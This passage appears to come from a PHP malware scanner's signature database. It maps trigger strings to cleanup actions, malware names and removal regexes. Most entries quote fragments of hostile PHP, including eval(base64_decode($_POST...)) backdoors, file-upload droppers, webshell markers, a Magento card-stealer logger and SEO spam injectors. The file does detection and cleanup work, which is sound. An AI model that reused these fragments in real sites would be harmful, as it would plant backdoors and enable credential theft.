		'echo(base64_decode("PG9iamVjdCB0' => array(STR_CLEAR_MULTIMATCH, 'php.malware.swf-injection.001', 'add_action..wp_footer., \w+.;\nfunction\s+\w+[^\}]+echo.base64_decode..PG9iamVjdCB0[^\}]+\}'),
		'";echo$str = file_get_contents($file)' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.injector.089','\$file=base64_decode\([^\?]+;echo\$str = file_get_contents..file.;'),
		'=base64_decode(\'PHNjcmlwdCBzcmM9Imh0dHA6Ly9nMDAuY28vUD' => array(STR_CLEAR_MULTIMATCH, 'php.malware.g00.001', '\$\w+=\$_SERVER\[base64[^>\{\}]+PHNjcmlwdCBzcmM9Imh0dHA6Ly9nMD[^\{\}]+\{echo \$\w+;\}'),
		'jcyLjE4Ny8xLmpzJz48L3NjcmlwdD4=");' => array(STR_CLEAR_LINEMATCH, 'php.malware.oxxtm.002', 'echo\s+base64_decode\("PHNjcmlwdCB0eXBlPSd0[^"]+?E4Ny8xLmpzJz48L3NjcmlwdD4="\);'),
		'}else{echo "SORRY KILLED\n";}' => array(STR_CLEARFILE, 'php.backdoor.shell_dropper.001', NULL),
		'?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0;' => array(STR_CLEARFILE, 'php.backdoor.uploader.104', NULL),
		'echo @base64_decode("PG1hcnF1ZWUgc' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.215', 'function\s*(\w+)\(\)\s*{\s*(\$\w+)[^=]+=..google.i.;\s*(\$\w+)[^\$]+\$_SERVER\[.HTTP_USER_AGENT.\];\s*if\s*\(preg_match\(\2,\3\)\)\s*return\s*true;\s*else\s*return[^\}]+\}\s*if\s*\(\1\(\)\)\s*\{\s*echo\s*@base64_decode\(.PG1hcnF1ZWUgc[^\)]+\);\s*\}\s*else\s*\{\s*\W{2}\s*\}'),
		'echo $catid = isset($_GET[\'catid\'])?base64_decode' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.003', '\$id = ._GET[^\;\]]+\];\s*echo \$catid = isset.._GET[^\}]+\}\s*ob_start.\$\w\);\s*if..catid.\{[^\}]+\}\s*ob_end_flush..;'),
		'base64_decode("PHAgc3R5bGU9Im92ZXJmbG93OiB' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-links.003', 'function\s*\w+\(\)\s*{\s*\$\w+\s*=\s*[\'"]\/google\/i[\'"]\s*;\s*\$\w+\s*=\s*\$_SERVER\[[\'"]HTTP_USER_AGENT[\'"]\]\s*;\s*if\s*\(preg_match\(\$botAgents,\$agent\)\)\s*return\s*true\s*;\s*else\s*return\s*false\s*;\s*}\s*if\s*\(\w+\(\)\)\s*{\s*echo\s*(\@)?base64_decode\([\'"]PHAgc3R5bGU9Im92ZXJmbG93OiB[^\)]+\);\s*}\s*else\s*{\s*..\s*}'),
		'eyJjIjoiY3JlYXRlX2Z1bmN0aW9uIiwicCI6IiR4IiwiYSI6IkBldmFsKFwi' => array(STR_CLEARFILE, 'php.backdoor.webshell.158', NULL),
		'htm\',"w+"),@base64_decode($oIndex));' => array(STR_CLEARFILE, 'php.defaced.script.014', NULL),
		'if(@$_GET["mygodra"]){echo \'<!--MYGODRA-->' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.267', '@ob_start\(\);[\s]*\$[\w]+=[^;]+;[\s]*\$[\w]+=[^;]+;[\s]*\$[\w]+=[^;]+;[^\}]+MYGODRA-->.;exit\(\);[\s]*\}[^\n]+exit\(\);\}[\s]*(include\([^;]+\);|[\s\}]+function [\w]+\([^\)]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*md5\(md5[^\n]+return \$[\w]+;[\s]*\})'),
	),

	'(base64_decode(' => array(STR_TRIGGER,
	
		'eval(base64_decode' => array(STR_TRIGGER, 
			'rawurl%22%20.%20%22decode%22%3Bretur' => array(STR_CLEAR_LINEMATCH, 'php.malware.obfuscated.016.02', 'eval\(base64_decode\([\'"]if\%20\%28\%21defined\%28\%27ALREADY_RUN[^@]+function\%20\w+[^@]+rawurl\%22\%20\.\%20\%22decode\%22\%3Breturn\%20\%24\w+[^@]+Array\%28[^@]+eval(?:\/%\w+%2A\/)?\%28[^\)]+\)\s*\);'), 
			'@eval(base64_decode(\'QG9iX3N0YXJ0KCk7QHNldF90aW1lX2xpbWl0KDM2MDApO0Bz' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.infector.009', '\$[\w]+[\s]*=[^;]+;[^@]+@eval\(base64_decode\([^;]+;'),
			'aWYoIWRlZmluZWQoIlBIUF9FT0wiKSkK' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.032', 'eval\(base64_decode\(.?[\'"]aWYoIWRlZmluZWQoIlBIUF9FT0wiKSkK[^\)]+\)\)\s*;'),
			'aWYgKCRpZCA9PSAiIik' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.038', 'eval\(base64_decode\(.\w+c3lzdGVtK\w+.\)\)\s*;'),
			'owO0lGelpwOp01JhdyWUN1TQ9FJg4CIn42bpR3YhdCKj5Wd' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.WSO.017','\$[\w]+[\s]*=[\s]*.{100,};[\s]*\$[\w]+[\s]*=[\s]*array\(.{100,}\);[\s]*eval\(base64_decode\(str_replace\(.[\w]+.,[\s]*.[\w]+.,[\s]*call_user_func\(\$[\w]+\[[\d]+\]\.\$[\w]+\[[\d]+\][^;]+,[\s]*\$[\w]+\)\)\)\);'),
			'PD9waHAKZWNobygnWHNhbS1YY' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.040', 'eval\(base64_decode\(.PD9waHAKZWNobygnWHNhbS1YY[^\)]+\)\);'),
			'GMINC90LUg0YPQvNC10YAhICov' => array(STR_CLEARFILE, 'php.backdoor.filesman.143', NULL),
		),
	
		'[$i])-1);}return $' => array(STR_TRIGGER,
			'"));function' => array(STR_CLEAR_LINEMATCH, 'php.malware.chord64.002', 'eval\([\w]+\("[^"]{500}[^"]+"\)\);function [\w]+\(\$[\w]+\)\{\$[\w]+=gzinflate\(base64_decode\(\$[\w]+\)\);for\(\$i=0;\$i<strlen\(\$[\w]+\);\$i\+\+\)\{\$[\w]+\[\$i\] = chr\(ord\(\$[\w]+\[\$i\]\)-[\d]+\);\}return \$[\w]+;\}'),
			';}eval(' => array(STR_CLEAR_LINEMATCH, 'php.malware.chord64.002.02', 'function [\w]+\(\$[\w]+\)\{\$[\w]+=gzinflate\(base64_decode\(\$[\w]+\)\);for\(\$i=0;\$i<strlen\(\$[\w]+\);\$i\+\+\)\{\$[\w]+\[\$i\] = chr\(ord\(\$[\w]+\[\$i\]\)-[\d]+\);\}return \$[\w]+;\}eval\([\w]+\("[^"]{500}[^"]+"\)\);'),
		),
	
		'eval(gzinflate(base64_decode(\'HZz' => array(STR_TRIGGER,
			'HZzHkuNQdgV/ZXYzE1jAu5' => array(STR_CLEAR_MULTIMATCH,'php.malware.generic.020.001','eval.gzinflate.base64_decode..HZz[^ ]*;'),
			'HZz' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.020','eval.gzinflate.base64_decode..HZz[^ ]*;'),
		),
	
		'json_decode(base64_decode(' => array(STR_TRIGGER,    
			'json_decode(base64_decode(substr($_POST' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.048', 'if.isset.\$_POST..search_pinger[^>]+json_decode.base64_decode.[^<]+<div\s*id[^>]+>..json_encode[^\?]+ping[^\}]+\}'),
			'file_get_contents(\'http://\'.$_POST[\'url\'].\'/link.php?key=\'.$_POST[\'key\'].$parameters)' => array(STR_CLEARFILE, 'php.backdoor.wp_jm_links_to_db.001', NULL),
		),
	
		'aHR0cDovL2Nkbi5nb21hZmlhLmNvbQ==' => array(STR_TRIGGER,
			'gma_styles' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.nulled_by_gomafia.001', 'add_action.\s*.wp_enqueue_scripts.,\s*.gma_styles.\s*\);\s*add_action\([^\)]+?gma_footer.\);\s*function gma_footer..\s*\{[^\}]+\}\s*function gma_styles\s*\(\)\s*\{[^\}]+?css..;\s*\}'),
			'echo @file_get_contents(base64_decode("aHR0cDovL' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.nulled_by_gomafia.002', 'echo \@file_get_contents.base64_decode..aHR0cDovL2Nkbi5nb21hZmlhLmNvbQ==.\)\);'),
		),
	
		'Mage' => array(STR_PATH_TRIGGER,
			')));__halt_compiler();aWY' => array(STR_TRIGGER,
				'=file(__FILE__);eval(base64_decode(' => array(STR_STOP, 'php.malware.magento-cc-stealer.074', NULL), //must preceed php.malware.generic.010; by PG
			),
		),
	
		'eval(base64_decode(\'aWY' => array(STR_TRIGGER,
			'echo copy(\'http://seo-moz.com/' => array(STR_CLEAR_MULTIMATCH,'php.malware.fake-seo-moz.001', 'echo copy..http:..seo-moz.com[^\)]+\);[^<\}]+\$serialized_value = .eval.base64_decode..aW[^<\}]+?DIRECTORY_SEPARATOR . \'header.php\';'),
		),
	
		'="aHR0cDovL3d3dy5' => array(STR_TRIGGER,
			'?password=systemseo' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.urlfilelist.001', '(\$\w+)=.aHR0cDovL3d3dy5.+?(\$ids=new IDS.\1.|echo "<\!--read_url ends-->");'),
		),
	
		'$data = $document->render( $this->getCfg(\'caching\'), $params);' => array(STR_TRIGGER,
			'$data = str_replace(base64_decode(' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.spam-links.006', '\$data = str_replace\(base64_decode\([^,]+?,\s*?base64_decode[^,]+?,\s*?\$data\);'),
		),
	
		'$a = JResponse::toString($mainframe->getCfg(\'gzip\'));' => array(STR_TRIGGER,
			'echo str_replace(base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.spam-links.008', '\$a = JResponse::toString..mainframe..getCfg..gzip...;\s*?echo str_replace\(base64_decode\([^;]+?;'),
		),
	
		': return; goto ' => array(STR_TRIGGER,
			'RCPT TO: ' => array(STR_CLEARFILE, 'php.mailer.goto.001', NULL),
		),
	
		'@serialize($_POST)."--".@serialize($_COOKIE) )."\n", FILE_APPEND);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.043', 'if[\\s]*\\(preg_match\\(\".\"\\.base64_decode\\(.[^)]+\\)\\...i.,[\\s]*\\$_SERVER..REQUEST_URI.\\]\\)\\)\\{[\\s]*if.!empty.._POST..[\\s]*@file_put_con[^;]+FILE_APPEND\\);'),
		'echo(stripslashes(base64_decode(\'P' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.001', 'echo.stripslashes.base64_decode..P[^;]+;'),
		']=Array(base64_decode(\'aXAybG9uZw==\'),' => array(STR_CLEARFILE, 'php.spam-seo.injector.006.002', NULL),
		'eval(gzinflate(base64_decode(\'tV' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.003', 'eval.gzinflate.base64_decode..tV[^;]+;'),
		'eval(gzinflate(base64_decode(\'rVdbU' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.004', 'eval.gzinflate.base64_decode..rVdbU[^;]+;'),
		'eval(gzinflate(base64_decode(\'DZ' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.005','eval.gzinflate.base64_decode..DZ[^;]+;'),
		'eval\(base64_decode\(.?ZX' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.generic.006','eval.base64_decode..?ZX[^;]+;'), //reverted
		'eval(base64_decode("ZnVu' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.006.02','eval.base64_decode..ZnVu[^;]+;'),
		'eval(base64_decode("JGNvZGU' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.007','eval.base64_decode..JGNvZGU[^;]+;'),
		'eval(base64_decode("JHgw' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.008','eval.base64_decode..JHgw[^;]+;'),
		'eval(base64_decode(\'JHgw' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.009','eval.base64_decode..JHgw[^;]+;'),
		'eval(base64_decode("aWY' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.010','@?eval.base64_decode..aWY[^;]+;'),
		'eval(base64_decode("CmVy' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.012','eval.base64_decode..CmVy[^;]+;'),
		'eval(base64_decode(\'LypCQ' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.014','eval.base64_decode..LypCQ[^;]+;'),
		'eval(base64_decode("Y2xhc3Mgbm' => array(STR_CLEARFILE,'php.malware.generic.016', NULL),
		'eval (base64_decode("IC8q' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.013','eval .base64_decode..IC8q[^;]+;'),
		'eval(gzinflate(base64_decode("BcFJ' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.021','eval.gzinflate.base64_decode..BcFJ[^ ;]*;'),
		'eval(gzinflate(Str_Rot13(base64_decod' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic-Str_Rot13.001', 'eval.gzinflate.Str_Rot13.base64_decod[^ ;]*;'),
		'echo(gzinflate(base64_decode("' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.023', 'echo.gzinflate.base64_decode[^;]+;'),
		'$link=gzinflate(base64_decode(file_get_contents($path."/libraries/joomla/environment/"' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.joomla-pharma.002', 'if.substr_count.._SERVER."REQUEST_URI".,.administrator..==0 .. substr_count..tmp_content[^\}]+\$tmp_content[\s]*=[\s]*preg_replace[^;]+\);[\s]*echo \$tmp_content;[^\*]+\*\$link[^\*]+preg_match[^;]+\);[^\}]+[\s\}]+\$tmp_content[\s]*=[\s]*\$page;[\s\}]+'),
		'if(preg_match(base64_decode(\'Lyh5YW5kZXh' => array(STR_CLEAR_LINEMATCH,'php.malware.hidden-iframe.001', 'if.preg_match.base64_decode..Lyh5YW5[^<>]+?getenv.base64_decode..SFRU[^<>]+?echo base64_decode..PGl[^<>]+?\);'),
		'<?php /*** PHP Encode v1.0 by zeura.com' => array(STR_CLEARFILE, 'php.malware.pack.005', NULL),
		'(str_rot13(base64_decode(($mrsimple)' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.007', NULL),
		'eval(base64_decode(\'aWdub3JlX3VzZXJfYW' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.054', 'eval\(base64_decode\(.aWdub3JlX3VzZXJfYWJvcnQoK[^;]+.\)\);'),
		'print(base64_decode("PGlmcmFtZSBzY3JvbGxpbmc9I' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injection.100', 'print\(base64_decode\("PGlmcmFtZSBzY3JvbGxpbmc9I[^"]+"\s*\)\s*\)\s*;'),
		'eval(gzinflate(base64_decode(\'y8xLzil' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.051', 'eval\(gzinflate\(base64_decode\(\'y8xLzi[^\']+\'\)\)\)\s*;'),
		'header(base64_decode(\'TG9jYXRpb246IGh0dHB' => array(STR_CLEAR_LINEMATCH, 'php.malware.redirect.022', 'header\(base64_decode\(.[a-zA-Z0-9\/+]*={0,2}.\)\);die\(\);'),
	),

	'($_POST[' => array(STR_TRIGGER,

		'base64_decode($_POST[' => array(STR_TRIGGER,
		
			'eval($' => array(STR_TRIGGER,

				'= base64_decode($_POST[' => array(STR_TRIGGER,
					'echo "indata_error";' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.054', NULL),
					'switch($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.055', 'error_reporting[^\}]+if\(isset\(\$_POST\[.(\w+).\][^\;]+switch\(\$_POST\[.\1[^;]+base64_decode\(\$_POST[^\>]+eval\(\$[^}]+\}\s*+exit;[^}]+\}\s*+exit;\s*\}'),
					'if(isset($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.051', '(if\s*\(isset\(\$_GET\[.\w+.\]\)[^\{]+\{\s*echo[^;]+;\s*\}\s*elseif\(isset\(\$_FILES\[[^\{]+\{if\(is_uploaded_file[^\{]+\{\s*move_uploaded_file[^;]+;\s*echo\s*.true.;\s*\}\}\s*else)?if\(isset\(\$_POST\[.\w+.\]\)\)\{\s*\$\w+\s*=\s*base64_decode\(\$\_POST\[.\w+.\]\);\s*.eval\(\$\w+\);\s*\}'),
				),

				'(in_array(strtolower(ini_get(\'safe_mode\'))' => array(STR_TRIGGER,
					'("chmod 0777 {$file}");' => array(STR_CLEARFILE, 'php.hacktool.downloader.009', NULL),
				),

				'$socket = fsockopen("udp://$IP", $port' => array(STR_CLEARFILE, 'php.backdoor.anishell.001', NULL),
			),

			'(!extension_loaded("openssl")' => array(STR_TRIGGER,
				'openssl_cipher_iv_length($' => array(STR_TRIGGER,
					'file_put_contents($_SERVER["DOCUMENT_ROOT"]' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.118', NULL),
				),
			),

			'assert(base64_decode($_POST[' => array(STR_TRIGGER,
				'@ini_set("log_errors",0); @ini_set("error_log",0); if(isset($_POST["' => array(STR_CLEARFILE, 'php.backdoor.generic.060', NULL),
			),
		
			'header("Location:' => array(STR_TRIGGER,
				'$rand=$chars{rand(0, strlen($chars)-1)}.$chars{rand(0' => array(STR_CLEARFILE, 'php.malware.redirect.007', NULL),
			),

			'; file_put_contents($' => array(STR_TRIGGER,
				'); unlink($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_put_contents.001.02', '(\$\w+)\s*=\s*base64_decode\(\$_POST\[[^\)]+\)\s*;\s*(\$\w+)\s*=\s*.?[\'"]\/tmp\/[^;]+;\s*file_put_contents\(\2\s*[^\$]+\1\)\s*;\s*include\(\2\)\s*;\s*unlink\(\2\)\s*;'),
			),

			'imap_mail($' => array(STR_TRIGGER,
				'\$[\w]+[\s]*=[\s]*base64_decode\(\$_POST\[.[\w]+.\]\);[\s]*\$[\w]+[\s]*=[\s]*imap_mail\(\$[\w]+,[\s]*\$[\w]+[^;]+\);[^>]+if[\s]*\(\$[\w]+\)[\s]*\{[\s]*echo[\s]*.[\w]+.;' => array(REX_CLEARFILE, 'php.hacktool.mailer.104', NULL),
			),

			'$data[\'action\']($data[\'args\'],$data[\'args2\']);' => array(STR_TRIGGER,
				'@unserialize(gzdecode(base64_decode($_POST[md5($_SERVER[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.127', 'if[\s]*\(!function_exists\(.[\w]+.\)\)[\s]*\{[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[^@]+@unserialize\(\$[\w]+\);[\s]*\}[\s]*else[\s]*\{[\s]*return[\s]*array\([^@]+@unserialize\(gzdecode\(base64_decode\(\$_POST\[md5\(\$_SERVER\[.HTTP_USER_AGENT.\]\)\]\)\)\);[\s]*\}[\s]*if[\s]*\(\(\$[\w]+[\s]*===[\s]*false\)[\s]*\|\|[\s]*\(md5\(\$[\w]+\[.[\w]+.\]\)[\s]*!=[\s]*\$[\w]+\)\)[\s]*\{[\s]*return[\s]*false;[\s]*\}[^\}]+\}[\s]*return[\s]*\$[\w]+;[\s]*\}[\s]*else[\s]*if[\s]*\(!empty\(\$[\w]+\[.[\w]+.\]\)\)[\s]*\{[\s]*return[\s]*\$[\w]+\[[^\{]+\{[\s]*exit[\s]*\(serialize\(\$[\w]+\)\);[\s]*\}'),
			),

			'(@md5($_POST["key"]) == HASH_KEY)' => array(STR_TRIGGER,
				'(isset($_POST["code"]) && @_isAuth())' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.137', NULL),
			),

			'$val) { curl_setopt($ch, $opt, $val); }' => array(STR_CLEARFILE, 'php.hacktool.curl_proxy.001', NULL),
			'preg_replace("~(</body>)~i", "{$this->js}\r\n{$tracker_code' => array(STR_CLEARFILE, 'php.spam-seo.link_injector.004', NULL),
			'input type="hidden" name="cc" required' => array(STR_CLEARFILE, 'php.phishing.generic.036', NULL),
			'function handle_bot_cmd_shell() {' => array(STR_CLEARFILE, 'php.backdoor.botshell.002', NULL),
			'<title>404 Not Found</title>' => array(STR_CLEARFILE, 'php.phishing.mailer.046', NULL),
			'if(isset($_POST[\'action\']) && (isset($_POST[\'key\']) && $_POST[\'key\']==$this->key) && isset($_POST[' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.057', NULL),
			'$stream=@fopen($_REQUEST[\'ef\'],"w");' => array(STR_CLEARFILE, 'php.backdoor.uploader.139', NULL),
			'eval(base64_decode(base64_decode($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.084', '(?:\/\*\s*Plugin Name[^*]+?\*\/\s*)?eval\(base64_decode\(base64_decode\(\$_POST\[[^;]+?;'),
			'file_put_contents($c,\'<?php \'.$a); include($c)' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.codeinclude.002', '\$\w+\s*=\s*base64[^;]+;\s*[^_]+?_put_contents\(\$c,.<\?php .\.\$a\); include\(\$c\)\s*;\s*unlink[^;]+?;'),
			'@preg_replace(\'/^/e\',\'e\'.\'val(base64' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.074', 'if\(isset\(\$_POST\[.\w+.\]\)\)\s*{\s*\@preg_replace\([\'"]\/\^\/e[\'"],[\'"\.\s*eval]+\(base64_decode\(\$_POST\[.\w+.\]\)\)[\'"],\s*[\'"]add[\'"]\);\s*break;\s*}'),
			'<?php ".gzuncompress(base64_decode($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.120', '\@ini_set\(.(?:display|log)_errors.\s*,\s*(?:true|false)\s*\)\s*;\s*\@\s*ini_set\(.(?:display|log)_errors.\s*,\s*(?:true|false)\s*\)\s*;\s*error_reporting\(\d\)\s*;\s*if\s*\(isset\(\$_REQUEST\[.\w+.\]\)\s*\&+\s*\$_REQUEST\[.\w+.\]\s*=[^}]+}\s*if\(isset\(\$_POST\[.\w+.\]\)[^{]+{\s*\$\w+\s*=\s*dirname\(__FILE__\)\s*;\s*(\$\w+)[^\@]+\@\s*unlink\((\$\w+)\s*\)\s*;\s*}\s*}\s*}\s*else\s*{\s*foreach\(\s*glob\([^\)]+\)\s*as\s*\2\s*\)\s*{\s*\@\s*unlink\(\2\)\s*;\s*}\s*}\s*register_shutdown_function\(.unlink[^;]+;\s*\2\s*=\s*\@\s*fopen\(\1\s*,\s*.w.\s*\)\s*;\s*\@\s*fwrite\(\2\s*,\s*.<\?php\s*.\.gzuncompress\(base64_decode\(\$_POST\[.\w+.\]\s*\)\s*\)\s*\)\s*;\s*\@\s*fclose\(\2\)\s*;\s*include\s*\1\s*;\s*}\s*;'),
			'};}if(mail($_POST["\x74o"],$_POST[' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.mailer.125', '\$\{[^\}]+\}\[[^_]+error_reporting\([\d]+\);date_default_timezone_set\(\$_POST\[[^_]+if\(!empty\(\$_POST\[[^#]+}=json_encode\(array\([^\}]+\)\);[\s]*die\(\$\{\$[\w]+\}\);\}'),
			'<\?php[\s]*eval[\s]*\([\s]*base64_decode[\s]*\(\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*;' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.136', 'eval[\s]*\([\s]*base64_decode[\s]*\(\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*;'),
		),

		';@${${' => array(STR_TRIGGER,
			'){$' => array(STR_TRIGGER,
				';if(isset($_GET[' => array(STR_TRIGGER,
					'}=base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.030', '\$\{[\'"][^\}]+\}\[[^\]]+\][\s]*=[\s]*[^;]+;if\(isset\(\$_GET\[[^\]]+\]\)[^@]+\}=base64_decode[^;]+;@\$\{\$\{[^>]+\]\);exit[^;]*;\}'),
				),
			),
		),

		'if(isset($_POST["hash"]) and @md5($_POST["hash"]) == "' => array(STR_TRIGGER,
			'"+/="' => array(STR_TRIGGER,
				'= base64_decode(strtr($_POST["' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.001', 'if.isset...POST..hash[^{]+\\{[\\s]*((\\$cmd = base64_decode.strtr[^>]+?die;[\\s]*})|(if.isset...POST..file[^$]+\\$[\\w]+[\\s]*=[\\s]*base64_decode.strtr[^>]+?die;[\\s]*}[\\s]*}))'), //modified by PG to cover more variants
			),
		),

		'\'],base64_decode($_POST[\'' => array(STR_TRIGGER,
			'\']){file_put_contents($_POST[\'' => array(STR_TRIGGER,
				'if($_POST[\'' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_gen.006', 'if.._POST..\w+..\)\{file_put_contents.._POST..\w+..,base64_decode.._POST..\w+..\)\);\}'),
			),
		),

		'cin",0755);' => array(STR_TRIGGER,
			'$write = fwrite ($file ,base64_decode($config));' => array(STR_CLEARFILE, 'php.backdoor.symlink-sa.003', NULL),
		),

		'PayPal' => array(STR_TRIGGER,
			'$_POST[base64_decode(chr(' => array(STR_CLEARFILE, 'php.phishing.paypal.013.04', NULL), 
		),

		'show_popup' => array(STR_TRIGGER,
			';echo "<meta http-equiv=\'refresh\' content=\'0; url=$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.072', 'error_reporting\(E_ALL\);\$\w+=[^;]+;\$\w+=..var.tmp.[^;]+;\s*if\(isset\(\$_POST\[.\w+.\]\)\)\{check_status\(\$\w+,\$\w+\);\s*return;\}else\s*if\(isset[^\{]+\{\$domain=\$_POST\[[^;]+;echo[^\{]+\{\$domain=[^<]+<strlen\([^\^]+\^ord\([^;]+;\}return[^_]+_enc[^"\']+.\s*<script[^>]+>\s*[^<]+<.script>\s*.;\}function[^"]+"<(script|meta)[^\!]+\!\$file\)\s*\{\$[^;]+;\$file=fopen\([^;]+;\}if\(\!\$file\)\{return;\}[^\}]+\}[^\}]+\}[^\{]+\{(return;\}|\$file=fopen)[^;]+;(fwrite\(\$file,\$str\);fclose\(\$file\);\}|if\(\![^\}]+\}if\(\![^;]+;\}\$\w+=enc[^;]+;fwrite[^;]+;fclose\(\$file\);\})'),
		),

		'=\'<?php \'.$' => array(STR_TRIGGER,
			'@file_put_contents($tofile,' => array(STR_TRIGGER,
				'@unlink($tofile);' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.025', NULL),
			),
		),

		'if ($fn==false){echo "File open error\n";die;}else echo "File open success\n";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.008', 'function wp_setcookie\(\$hash\) \{[^\}]+if \(\$fn==false\)\{echo "File open error[^\[]+\$in=\$_POST[^\}]+fclose\(\$fn\);\n\}\n\}|wp_setcookie\(\$_POST\[[^\]]+\]\);'),
		'(isset($_GET[base64_decode(chr(' => array(STR_CLEARFILE, 'php.phishing.paypal.013.03', NULL), 
		'/* xPayPal' => array(STR_CLEARFILE, 'php.phishing.paypal.013', NULL), 
		'\(.?YXNzZX' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.assert.005', '(\$\w+)=base64_decode[^>]+YXNzZX[^;]+;\s*\@?\$\w+\(\$_POST[^;]+;'),
		'file_put_contents($dirPath, base64_decode(substr($content->meta_value,' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.infector.007', 'if \\(!class_exists[^{]+\\{[\\s]*function[\\s]*[\\w]+\\(\\)[\\s]*\\{[\\s]*if[\\s]*\\(!class_exists[^{]+\\{[\\s]*global \\$wpdb, \\$table_prefix;[\\s]*\\$content[\\s]*=[\\s]*\\$wpdb->get_row[^@]+@touch..file,[^;]+;[\\s]*@chmod.\\$file[^;]+;[\\s]*file_put_contents..dirPath,[\\s]*base64_decode[^@]+@touch[^;]+;[\\s]*@chmod[^@]+@eval.._POST[^;]+;[\\s]*}[^;]+add_filter..init[^;]+\\);[\\s]*}'),
		';}function redirect($url){echo "<script type=\'text/javascript\' src=\'$url/static/main.js\'></script>";return;}' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect_gen.020', 'error_reporting\(E_ALL\)\s*;\$DOMAIN_FNAME[^{]+{\s*check_status\(\$DOMAIN_FNAME[^;]+;\s*return;}else\s*if\(isset\(\$_POST\[[^{]+{\s*\$\w+\s*=\s*\$_POST\[[^;]+;\s*echo[^;]+;\s*var_dump\(\$_POST\)[^\^]+\^ord\(\$key[^{]+{\$\w+\s*=\s*xor_enc\(\$\w+\);\s*\$\w+\s*=\s*base64_encode\(\$\w+\)\s*;\s*return\s*\$\w+\s*;\s*}[^}]+}\s*function\s*redirect\(\$\w+\)\s*{echo\s*"<script[^\$]+\$\w+\/static\/\w+.js\'><\/script>\s*"\s*;\s*return\s*;\s*}[^}]+}\s*function[^{]+{\$\w+\s*=\s*fopen\(\$\w+,\'\w+\'\);\s*\$\w+\s*=[^>]+>\d+\){\$\w+=fread\(\$\w+,filesize\(\$\w+\)\);}\s*\$\w+=dec\(\$\w+\);\s*fclose\(\$\w+\);[^\!]+\!\$\w+\)\s*{[^}]+}if[^;]+;}[^;]+;fwrite\(\$\w+,\$\w+\);fclose\(\$\w+\);}'),
		'eval(gzinflate(str_rot13(base64_decode(\'7L12W+PG0jD8bOa65' => array(STR_CLEARFILE, 'php.backdoor.1n73ct10n.001', NULL),
		'if[\s]*\(isset\(\$_POST\[.[\w].\]\)\)[\s]*\{[\s]*\$[\w][\s]*=[\s]*base64_decode\([^\)]+\.[^\)]+\)[^;]+;[\s]*@?\$[\w]\(\$_POST' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.117', 'if[\s]*\(isset\(\$_POST\[.[\w].\]\)\)[\s]*\{[\s]*\$[\w][\s]*=[\s]*base64_decode\([^\)]+\.[^\)]+\)[^;]+;[\s]*@?\$[\w]\(\$_POST[^\}]+\}'),
		'>|BYPASS SYM' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.004', NULL),
